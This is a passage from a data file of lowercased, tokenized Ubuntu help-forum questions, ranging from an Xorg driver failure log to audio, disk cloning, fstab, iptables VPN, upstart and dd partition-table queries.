+vsync ( 64.0 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 1440x900 '' x59.9 106.50 1440 1520 1672 1904 900 903 909 934 -hsync +vsync ( 55.9 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 1280x960 '' x60.0 108.00 1280 1376 1488 1800 960 961 964 1000 +hsync +vsync ( 60.0 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 1360x768 '' x59.8 84.75 1360 1432 1568 1776 768 771 781 798 -hsync +vsync ( 47.7 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 1360x768 '' x60.0 72.00 1360 1408 1440 1520 768 771 781 790 +hsync -vsync ( 47.4 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 1152x864 '' x60.0 81.62 1152 1216 1336 1520 864 865 868 895 -hsync +vsync ( 53.7 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 1024x768 '' x120.1 133.47 1024 1100 1212 1400 768 768 770 794 doublescan -hsync +vsync ( 95.3 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 1024x768 '' x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 960x720 '' x120.0 117.00 960 1024 1128 1300 720 720 722 750 doublescan -hsync +vsync ( 90.0 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 928x696 '' x120.1 109.15 928 976 1088 1264 696 696 698 719 doublescan -hsync +vsync ( 86.4 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 896x672 '' x120.0 102.40 896 960 1060 1224 672 672 674 697 doublescan -hsync +vsync ( 83.7 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 960x600 '' x120.0 77.00 960 984 1000 1040 600 601 604 617 doublescan +hsync -vsync ( 74.0 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 960x540 '' x120.0 69.25 960 984 1000 1040 540 541 544 555 doublescan +hsync -vsync ( 66.6 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 800x600 '' x120.0 81.00 800 832 928 1080 600 600 602 625 doublescan +hsync +vsync ( 75.0 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 800x600 '' x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 800x600 '' x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync ( 35.2 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 840x525 '' x120.0 73.12 840 892 980 1120 525 526 529 544 doublescan -hsync +vsync ( 65.3 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 840x525 '' x119.8 59.50 840 864 880 920 525 526 529 540 doublescan +hsync -vsync ( 64.7 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 800x512 '' x120.3 51.56 800 800 828 832 512 512 514 515 doublescan +hsync +vsync ( 62.0 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 700x525 '' x120.0 61.00 700 744 820 940 525 526 532 541 doublescan +hsync +vsync ( 64.9 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 640x512 '' x120.0 54.00 640 664 720 844 512 512 514 533 doublescan +hsync +vsync ( 64.0 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 720x450 '' x119.8 53.25 720 760 836 952 450 451 454 467 doublescan -hsync +vsync ( 55.9 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 640x480 '' x120.0 54.00 640 688 744 900 480 480 482 500 doublescan +hsync +vsync ( 60.0 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 640x480 '' x59.9 25.18 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 680x384 '' x119.6 42.38 680 716 784 888 384 385 390 399 doublescan -hsync +vsync ( 47.7 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 680x384 '' x119.9 36.00 680 704 720 760 384 385 390 395 doublescan +hsync -vsync ( 47.4 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 576x432 '' x120.1 40.81 576 608 668 760 432 432 434 447 doublescan -hsync +vsync ( 53.7 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 512x384 '' x120.0 32.50 512 524 592 672 384 385 388 403 doublescan -hsync -vsync ( 48.4 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 400x300 '' x120.6 20.00 400 420 484 528 300 300 302 314 doublescan +hsync +vsync ( 37.9 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 400x300 '' x112.7 18.00 400 412 448 512 300 300 301 312 doublescan +hsync +vsync ( 35.2 khz d ) [ 1944.267 ] ( ii ) modesetting ( 0 ) : modeline `` 320x240 '' x120.1 12.59 320 328 376 400 240 245 246 262 doublescan -hsync -vsync ( 31.5 khz d ) [ 1944.269 ] ( ii ) modesetting ( 0 ) : edid for output vga-0 [ 1944.269 ] ( ii ) modesetting ( 0 ) : edid for output hdmi-0 [ 1944.269 ] ( ii ) modesetting ( 0 ) : edid for output displayport-0 [ 1944.269 ] ( ii ) modesetting ( 0 ) : output lvds-0 connected [ 1944.269 ] ( ii ) modesetting ( 0 ) : output vga-0 disconnected [ 1944.269 ] ( ii ) modesetting ( 0 ) : output hdmi-0 disconnected [ 1944.269 ] ( ii ) modesetting ( 0 ) : output displayport-0 disconnected [ 1944.269 ] ( ii ) modesetting ( 0 ) : using exact sizes for initial modes [ 1944.269 ] ( ii ) modesetting ( 0 ) : output lvds-0 using initial mode 1920x1080 [ 1944.269 ] ( ii ) modesetting ( 0 ) : using default gamma of ( 1.0 , 1.0 , 1.0 ) unless otherwise stated . [ 1944.269 ] ( == ) modesetting ( 0 ) : dpi set to ( 96 , 96 ) [ 1944.269 ] ( ii ) loading sub module `` fb '' [ 1944.269 ] ( ii ) loadmodule : `` fb '' [ 1944.270 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 1944.270 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 1944.270 ] compiled for 1.13.4 , module version = 1.0.0 [ 1944.270 ] abi class : x.org ansi c emulation , version 0.4 [ 1944.270 ] ( ii ) loading sub module `` shadow '' [ 1944.270 ] ( ii ) loadmodule : `` shadow '' [ 1944.270 ] ( ii ) loading /usr/lib/xorg/modules/libshadow.so [ 1944.270 ] ( ii ) module shadow : vendor= '' x.org foundation '' [ 1944.270 ] compiled for 1.13.4 , module version = 1.1.0 [ 1944.270 ] abi class : x.org ansi c emulation , version 0.4 [ 1944.270 ] ( ii ) fbdev ( 1 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 1944.270 ] ( == ) fbdev ( 1 ) : depth 24 , ( == ) framebuffer bpp 32 [ 1944.270 ] ( == ) fbdev ( 1 ) : rgb weight 888 [ 1944.270 ] ( == ) fbdev ( 1 ) : default visual is truecolor [ 1944.270 ] ( == ) fbdev ( 1 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 1944.270 ] ( ii ) fbdev ( 1 ) : hardware : inteldrmfb ( video memory : 8100kb ) [ 1944.270 ] ( ii ) fbdev ( 1 ) : checking modes against framebuffer device ... [ 1944.270 ] ( ii ) fbdev ( 1 ) : checking modes against monitor ... [ 1944.270 ] ( -- ) fbdev ( 1 ) : virtual size is 1920x1080 ( pitch 1920 ) [ 1944.270 ] ( ** ) fbdev ( 1 ) : built-in mode `` current '' [ 1944.270 ] ( == ) fbdev ( 1 ) : dpi set to ( 96 , 96 ) [ 1944.270 ] ( ii ) loading sub module `` fb '' [ 1944.270 ] ( ii ) loadmodule : `` fb '' [ 1944.270 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 1944.270 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 1944.270 ] compiled for 1.13.4 , module version = 1.0.0 [ 1944.270 ] abi class : x.org ansi c emulation , version 0.4 [ 1944.270 ] ( ** ) fbdev ( 1 ) : using shadow framebuffer [ 1944.270 ] ( ii ) loading sub module `` shadow '' [ 1944.270 ] ( ii ) loadmodule : `` shadow '' [ 1944.271 ] ( ii ) loading /usr/lib/xorg/modules/libshadow.so [ 1944.271 ] ( ii ) module shadow : vendor= '' x.org foundation '' [ 1944.271 ] compiled for 1.13.4 , module version = 1.1.0 [ 1944.271 ] abi class : x.org ansi c emulation , version 0.4 [ 1944.271 ] ( ii ) unloadmodule : `` nvidia '' [ 1944.271 ] ( ii ) unloading nvidia [ 1944.271 ] ( ii ) unloadmodule : `` intel '' [ 1944.271 ] ( ii ) unloading intel [ 1944.271 ] ( ii ) unloadmodule : `` nouveau '' [ 1944.271 ] ( ii ) unloading nouveau [ 1944.271 ] ( ii ) unloadmodule : `` vesa '' [ 1944.271 ] ( ii ) unloading vesa [ 1944.271 ] ( == ) depth 24 pixmap format is 32 bpp [ 1944.271 ] unable to set master [ 1944.271 ] fatal server error : [ 1944.271 ] addscreen/screeninit failed for driver 0 [ 1944.271 ] [ 1944.271 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 1944.271 ] ( ee ) please also check the log file at `` /var/log/xorg.8.log '' for additional information . [ 1944.271 ] ( ee ) [ 1944.271 ] server terminated with error ( 1 ) . closing log file . i do n't understand why i get this error [ 1944.260 ] ( ee ) no devices detected i also see he try to load nouveau , but i necer says i want to use this , i want to use the nvidia driver . i also try to remove pakage from xorg-edger ( and set another bumblebee.conf ) without better result . before i was on nvidia-325 but i can not find this version anymore into xorg-edger ppa . and i think the problem come from another stuff the i cant find . i also check kern.log and syslog but there is nothing usefull only bbswith turn on ( or off when i restrat the bumblebee service after getting this error ) the device . all help will be welcome . regards
388926	do not show hidden icons	i see the hidden files in nautilus . i pressed ctrl + h but when i open the file manager again hidden files appear .
388929	ubuntu button click authentication	after upgrading from windows to ubuntu , i really like the operating system . the only point i find that is missing is the windows functionnality to authenticate administrator permissions only by clicking a button ( since the user is already logged in ) . i would find this a lot easier instead of having to type my password countless times per day . is it possible to configure ubuntu in a similar way ? http : //www.bu.edu/tech/files/2012/02/windowsuac_adobe.gif
388932	cloning dual boot drive	i would like to make an exact copy of my old 250 gb hdd ( not installed ) , and clone to a new 240 gb ssd ( installed ) . the old hdd is dual booted with equal partition scheme , refit booting osx snow leopard/ubuntu 12.10 . would i be better off cloning to an external drive then restoring the image from external to internal drive ( requiring internal drive swap ) ? or is there a way i could boot from the old hdd via usb then format and restore the installed ssd with the hdd image from within disk utility ? the machine is a 2009 macbook with osx mavericks installed . any advice would be appreciated !
388933	volume muted around 0 ~ 20 % level	it was fine until 13.10 . i 've tested with pavucontrol , alsamixer . when i was trying to get 0 ~ 20 % volume level , it always get muted . my laptop is dell inspiron 1501 . $ lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd/ati ] rs480/rs482/rs485 host bridge ( rev 10 ) 00:01.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rc4xx/rs4xx pci bridge [ int gfx ] 00:05.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rc4xx/rs4xx pci express port 2 00:06.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rc4xx/rs4xx pci express port 3 00:12.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb600 non-raid-5 sata 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci0 ) 00:13.1 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci1 ) 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci2 ) 00:13.3 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci3 ) 00:13.4 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci4 ) 00:13.5 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb controller ( ehci ) 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 14 ) 00:14.1 ide interface : advanced micro devices , inc. [ amd/ati ] sb600 ide 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb600 pci to lpc bridge 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge 00:18.0 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs482m [ mobility radeon xpress 200 ] 05:00.0 network controller : broadcom corporation bcm4311 802.11a/b/g ( rev 01 ) 08:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 08:01.0 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 08:01.1 system peripheral : ricoh co ltd r5c843 mmc host controller ( rev 01 ) $ sudo lspci -s '00:14.2 ' -vv 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) subsystem : dell device 01f5 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=slow > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 64 , cache line size : 32 bytes interrupt : pin a routed to irq 16 region 0 : memory at c0000000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 flags : pmeclk- dsi- d1- d2- auxcurrent=55ma pme ( d0+ , d1- , d2- , d3hot+ , d3cold+ ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- kernel driver in use : snd_hda_intel $ cat /proc/asound/card0/codec* | grep codec codec : conexant id 2bfa codec : sigmatel stac9200 $ grep model /etc/modprobe.d/alsa-base.conf options snd-hda-intel model=dell-m26
388935	e : encountered a section with no package : header	i get error message whenever i use the sudo apt command in terminal . also i cant open my ubuntu software center . plz help . my ubuntu version is 12.04
388940	ca n't write to external drive mounted by fstab	i followed this tutorial to have ubuntu automount an external usb drive onto the system . i added this line to /etc/fstab : uuid=885025e1-09a5-3f29-90f6-5d07668be59b /media/backup hfsplus rw , user , suid , uid=1000 , gid=1000 , umask=000 0 0 after rebooting the machine , i navigated to /media/backup . the drive showed up , and i could browse its contents , but i was n't able to write to it ( even as root ) . i 'm on ubuntu server 12.04.3 . how can i automatically mount the drive and be able to write to it , ideally as a normal user ?
388941	iptables problem with pptp vpn	i have in my job a server running iptables and some clients needs to connect simultaneously in pptp vpn connection . my network : 2x internet connection , one adsl+ 50 mbps and fiber optic 100 mbps . 192.168.0.3 tp-link load balance router 192.168.0.7 squid 3.3.2 proxy transparent server and gateway with 2 network adapter . 192.168.0.8 squid 3.3.11 proxy transparent server and gateway backup the first fiber optic internet , are connected directly at 192.168.0.7 with pppoe authentication with squid ( at squid start , automatically try to dial pppoe connection and turn on firewall ) and anyone use this internet connection to work at company . the second is connected at 192.168.0.3 ( and in the future both internet connections will be here ) . first test : client computer with any ip , for example : 192.168.0.130 with default gw 192.168.0.3 : ok ! works and no worry - but no internet lock . second test : the same computer with default gateway to 192.168.0.7 or 192.168.0.8 , do not work - waiting for authentication to long and do not connect . third test : the same computer with default gateway at 192.168.0.8 ( proxy backup ) and iptables disabled , work , but not always ! iptables is configured to allow port tcp 1723 and 47 gre protocol and forward packets . iptables proxy backup : *nat -a postrouting -o eth0 -j masquerade commit *filter -a input -o eth0 -j allow -a forward -o eth0 -p 47 -j allow -a forward -o eth0 -p tcp -- dport 1723 -j allow -a output -o eth0 -j allow commit anyone can help ?
388942	i 've tried to install ubuntu 12.04 & 12.10 & 13.04 in my hcl laptop but unable to finish installation	i 'm using hcl laptop with processor : intel ( r ) pentium ( r ) cpu 2330 @ 1.60 ghz . i 've started using ubuntu from ubuntu 8.04 lts ( hardy heron ) to till ubuntu 10.04 lts ( lucid lynx ) and after that i stick to lucid lynx untill the apt got expired so i needed to install the new apt functioning ubuntu . i love lts so i choosed 12.04 32 bit . problem i encountered during installation : - i made boot using universal usb installer and booted my system . after boot with in a few second my display goes off while my system keep running . it is happening with all the version of ubuntu from ubuntu 12.04 lts ( precise pangolin ) to ubuntu 13.10 ( saucy salamander ) . help if anyone can understand the problem ? while this problem is not occurring with older version of ubuntu ubuntu 10.10 ( maverick meerkat ) and ubuntu 10.04 lts ( lucid lynx ) .
388943	peazip : error while loading shared libraries : libx11.so.6	i 'm trying to get peazip running but i 'm facing some trouble . when i run peazip i get the error : peazip : error while loading shared libraries : libx11.so.6 : can not open shared object file : no such file or directory from what i searched , i need to install emul-linux-x86-compat and emul-linux-x86-gtklibs . however , i did n't find those packages . how can i resolve this ? ?
388944	ca n't start upstart	i want to run upstart job . i 've created upstart file and put it to /etc/init folder # /etc/init/myjob.conf description `` test job '' start on runlevel [ 2345 ] exec /home/megas/test.sh and then created script in home directory # /home/megas/test.sh # ! /bin/sh echo `` test job , reporting ... '' then i 'm trying to run sudo start myjob but got message start : job failed to start what i 'm doing wrong ? how to create upstart job ?
388945	why does gnome-terminal $ term display xterm	i 'm trying to get the solarized color scheme in my terminal and am working through some tutorials online . i have run across the $ term environment variable that from my understanding is the current name of the terminal i 'm using . i also have a $ colorterm which i 'm not quite sure what it is but it shows me : gnome-terminal whereas the $ term variable is xterm . is n't the terminal that ubuntu 13.10 uses the gnome-terminal ? why is xterm being displayed in the env var ?
388949	how to find a file whose size is less than 10 mb ?	i need to find a file in my current directory whose size should be less than or equal to 10 mb . ls -lh gives me the file size of each file but not sure how to find the files whose size are less than or equal to 10 mb . host @ 407d : t1_snapshot $ ls -lth is there any way i can do that ?
388956	prevent ( xfce ) terminal from scrolling with output	i 'm running xubuntu . when i run something that produces a lot of output to the terminal ( such as my code , generally ... . ! ) i find that it is not possible to `` freeze '' the screen , to take a look at a particular point in the run . for example : my code is generating output , and typically ( in other machines ) i can move the mousewheel upwards . this in essence stops the terminal from following the latest output to the screen and you can , at your leisure , look at the output while more is generated underneath . to catch up , i 'd normally tap the down arrow on the keyboard , it would jump to the latest line , and follow . xfce4-terminal 0.6.1 does not follow this behaviour , and i 'd like to know if there is a way to enable it . apologies if this is somewhat badly described ... .
388960	permission denied error while copying the files to another user directory using winscp ?	i have a few folder in one of my ubuntu machine in the directory /export/home/ as - user1 user2 user3 whenever any user login to that machine , it always takes him to that directory as a default . if i am user1 , and i am logging in to that machine , then after logging , if i do pwd , i always see - /export/home/user1 now what i am supposed to do is , i have opened a winscp on my desktop as user1 to connect to that machine , and then i need to copy a file from my desktop to user2 folder but whenever i try to open user2 folder in winscp , it always gives me - permission denied error.. is there any way , i can ask user2 to give me permission ( by logging into his account from putty ) to copy the files using winscp from my desktop to user2 folder ?
388961	somethin ' loads mine lo traffic	i 'm having trouble , suddenly , when i had been installed an ups , traffic is running away . $ sudo tcpdump -ni lo '' 02:50:59.450015 ip 127.0.0.1.50214 > 127.0.0.1.59783 : flags [ p. ] , seq 522:523 , ack 244 , win 518 , options [ nop , nop , ts val 1486457 ecr 1486432 ] , length 1 02:50:59.450099 ip 127.0.0.1.59783 > 127.0.0.1.50214 : flags [ p. ] , seq 244:245 , ack 523 , win 518 , options [ nop , nop , ts val 1486457 ecr 1486457 ] , length 1 02:50:59.450150 ip 127.0.0.1.50214 > 127.0.0.1.59783 : flags [ . ] , ack 245 , win 518 , options [ nop , nop , ts val 1486457 ecr 1486457 ] , length 0 02:50:59.450221 ip 127.0.0.1.50214 > 127.0.0.1.59783 : flags [ p. ] , seq 523:580 , ack 245 , win 518 , options [ nop , nop , ts val 1486457 ecr 1486457 ] , length 57 02:50:59.450312 ip 127.0.0.1.59783 > 127.0.0.1.50214 : flags [ p. ] , seq 45:271 , ack 580 , win 518 , options [ nop , nop , ts val 1486457 ecr 1486457 ] , length 26 02:50:59.471715 ip 127.0.0.1.50281 > 127.0.0.1.59783 : flags [ . ] , ack 266 , win 350 , options [ nop , nop , ts val 1486463 ecr 1486453 ] , length 0 02:50:59.487670 ip 127.0.0.1.50214 > 127.0.0.1.59783 : flags [ . ] , ack 271 , win 518 , options [ nop , nop , ts val 1486467 ecr 1486457 ] , length 0 02:50:59.550540 ip 127.0.0.1.50214 > 127.0.0.1.59783 : flags [ p. ] , seq 580:581 , ack 271 , win 518 , options [ nop , nop , ts val 1486482 ecr 1486457 ] , length 1 02:50:59.550656 ip 127.0.0.1.59783 > 127.0.0.1.50214 : flags [ p. ] , seq 271:272 , ack 581 , win 518 , options [ nop , nop , ts val 1486482 ecr 1486482 ] , length 1 02:50:59.550709 ip 127.0.0.1.50214 > 127.0.0.1.59783 : flags [ . ] , ack 272 , win 518 , options [ nop , nop , ts val 1486482 ecr 1486482 ] , length 0 02:50:59.550797 ip 127.0.0.1.50214 > 127.0.0.1.59783 : flags [ p. ] , seq 581:638 , ack 272 , win 518 , options [ nop , nop , ts val 1486482 ecr 1486482 ] , length 57 02:50:59.550913 ip 127.0.0.1.59783 > 127.0.0.1.50214 : flags [ p. ] , seq 272:298 , ack 638 , win 518 , options [ nop , nop , ts val 1486482 ecr 1486482 ] , length 26 ... ... ... ... ... ... ... ... .. i have used nut for setting it ( ups ) up . what i had to do to exit this ? it 's looks like ping .
388964	any installation pointers for newbie ?	i 've decided to go ahead and make the change to ubuntu ; and based strictly on a first-ever positive experience with the usb ubuntu desktop trial . all seems okay , finally , as far as hardware and drivers ( dell intel board ) under the default install . presently running win7pro ; and i have n't got a clue : will the installer do everything for me , or do i need to learn a bit of the command prompt coding that i keep seeing here on the forum ? i recall learning all dos5 ( cmd prompt ) within a few hours , but how deep is ubuntu desktop ? any pointers or links would be appreciated ; and thanks in advance .
388967	install libmysqlclient-dev 5.6	i ca n't use the mysql ruby gem because i get this error : incorrect mysql client library version ! this gem was compiled for 5.6.15 but the client library is 5.5.34 . ( runtimeerror ) apt-get is installing libmysqlclient-dev-5.5 $ sudo apt-get install libmysqlclient-dev reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : libmysqlclient-dev 0 upgraded , 1 newly installed , 0 to remove and 41 not upgraded . need to get 1,397 kb of archives . after this operation , 5,629 kb of additional disk space will be used . get:1 http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ precise-updates/main libmysqlclient-dev amd64 5.5.34-0ubuntu0.12.04.1 [ 1,397 kb ] fetched 1,397 kb in 0s ( 11.8 mb/s ) selecting previously unselected package libmysqlclient-dev . ( reading database ... 63296 files and directories currently installed . ) unpacking libmysqlclient-dev ( from ... /libmysqlclient-dev_5.5.34-0ubuntu0.12.04.1_amd64.deb ) ... processing triggers for man-db ... setting up libmysqlclient-dev ( 5.5.34-0ubuntu0.12.04.1 ) ... how do i install version 5.6 of libmysqlclient-dev ? i 'm using ubuntu 12.04 .
388970	no audio on my toshiba laptop s50d -a after installing ubuntu 12.04	my audio does n't work on my toshiba laptop after a clean install of ubuntu 12.04 lts . i am pretty new to ubuntu and i really tried everythig , i have looked trough google and could n't find any solution . some informations : 00:00.0 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root complex 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] richland [ radeon hd 8610g ] 00:01.1 audio device : advanced micro devices , inc. [ amd/ati ] trinity hdmi audio controller 00:02.0 pci bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root port 00:04.0 pci bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root port 00:07.0 pci bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root port 00:10.0 usb controller : advanced micro devices , inc. [ amd ] fch usb xhci controller ( rev 09 ) 00:11.0 sata controller : advanced micro devices , inc. [ amd ] fch sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 11 ) 00:12.2 usb controller : advanced micro devices , inc. [ amd ] fch usb ehci controller ( rev 11 ) 00:13.0 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 11 ) 00:13.2 usb controller : advanced micro devices , inc. [ amd ] fch usb ehci controller ( rev 11 ) 00:14.0 smbus : advanced micro devices , inc. [ amd ] fch smbus controller ( rev 16 ) 00:14.2 audio device : advanced micro devices , inc. [ amd ] fch azalia controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd ] fch lpc bridge ( rev 11 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd ] fch pci bridge ( rev 40 ) 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 0 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 1 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 2 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 3 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 4 00:18.5 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 5 01:00.0 display controller : advanced micro devices , inc. [ amd/ati ] sun pro [ radeon hd 8500m series ] 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter ( rev 01 ) 03:00.0 ethernet controller : qualcomm atheros qca8172 fast ethernet ( rev 10 ) i really need to some help to get my audio working .
388978	easy audio cutter for ubuntu	are there any easy audio cutter ? ? ? like this ? for ubuntu ? or is possible use this program with wine ?
388987	bridged network not working	nat works fine and i have internet connection , but bridged connection not working . i have tried quiet a few things , including resetting mac address for bridged adapter : when i do ifconfig it does not show eth0 but when i look in interfaces eth0 is in there as shown below : it was working before so i do n't know what could be the issue . i also noticed when i restart vm it stalls for a while saying configuring network settings or something along those lines but i am guessing it never receives the settings .
388989	how to get network adapter working on ubuntu ?	i posted this question before , but none of the suggestions worked . i have a few more details to give on my adapter , though . my question : how do i get the internet working on ubuntu ? system : dual-boot with windows xp and ubuntu 12.04 lts ; network adapter : cisco linksys ae1200 wireless-n usb adapter ( works great on windows ) i have no experience with linux or ubuntu , so i 'm sure the problem is not an error with the computer or the adapter . i just do n't know how to get it working right now . any help greatly appreciated . : )
388991	adobe flash disabled in chromium after update . how to fix this ?	flash was working fine in chromium . then i got a notification there was an update for chromium . after upgrading flash stops working in chromium . it seems for some reason it was disabled : chrome : //version/ shows : chromium 30.0.1599.114 ( developer build 30.0.1599.114-0ubuntu0.13.04.2 ) ubuntu 13.04 os linux blink 537.36 ( @ 159105 ) javascript v8 3.20.17.15 flash ( disabled ) flash still works in firefox so this is a problem of chromium . how do i fix this ?
388993	fail to install `` firmware for linux kernel drivers ''	my computer can not update the firmware for linux kernel drivers . could you please help me with the error below ? installarchives ( ) failed : ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 205634 files and directories currently installed . ) preparing to replace linux-firmware 1.79 ( using ... /linux-firmware_1.79.9_all.deb ) ... unpacking replacement linux-firmware ... dpkg : error processing /var/cache/apt/archives/linux-firmware_1.79.9_all.deb ( -- unpack ) : trying to overwrite '/lib/firmware/ar3k/ramps_0x31010000_40.dfu ' , which is also in package bt-dw1705-firmware 0.1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-firmware_1.79.9_all.deb error in function :
388997	when using dd how is bs=1 count=512 different than bs=512 count=1	i was taking a forensics exam . i used dd to image the device : /dev/sdb the command i used is : # dd if=/dev/sdb of=sdb.img i continued on to extract the mbr # dd if=sdb.img bs=1 count=512 of=sdb.mbr to look at the partition table i used : # dd if=sdb.img bs=1 count=66 skip=446 | xxd -cols 16 which provides the following information : 0000000 : 0020 2100 06df 130c 0008 0000 0020 0300 . ! ... ... ... . .. 0000010 : 00df 140c 0561 277a 0028 0300 00d8 1a00 ... ..a'z. ( ... ... 0000020 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000030 : 0000 0000 0000 0000 0000 0000 0000 0000 ... ... ... ... ... . 0000040 : 55aa as expected noting bit 4 of partition 2 is 05 , extended . bits 8,9,10,11 should tell me where the next mbr is when properly converted to decimal 00 28 03 00 becomes 00 03 28 00 and then converted to decimal is : 206848 well when i type the following : dd if=sdb.img bs=512 count=1 skip=206848 |xxd i get the following output : 1+0 records in 1+0 records out 512 bytes ( 512 b ) copied , 0.000124768 s , 4.1 mb/s 0000000 : eb58 906d 6b64 6f73 6673 0000 0208 2000 .x.mkdosfs ... . . 0000010 : 0200 0000 00f8 0000 3e00 1f00 0000 0000 ... ... .. > ... ... . 0000020 : 